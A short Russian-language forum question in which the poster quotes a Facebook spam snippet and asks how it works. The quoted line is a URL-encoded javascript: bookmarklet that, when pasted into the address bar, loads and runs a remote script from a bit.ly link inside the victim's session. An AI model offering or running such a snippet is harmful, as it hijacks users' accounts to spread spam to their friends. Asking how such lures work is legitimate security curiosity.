Итак, я только что видел этот спам-код на Facebook, написанный на JavaScript, и я подумал, может ли кто-нибудь объяснить мне, как этот код работает и взаимодействует с Facebook. Я не собираюсь использовать это в злонамеренных целях, но я просто заинтересован в безопасности таких сайтов, как Facebook. Вот код, который выполняется из адресной строки (я советую не пробовать его самостоятельно, у вас может получиться несколько раздраженных друзей).
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)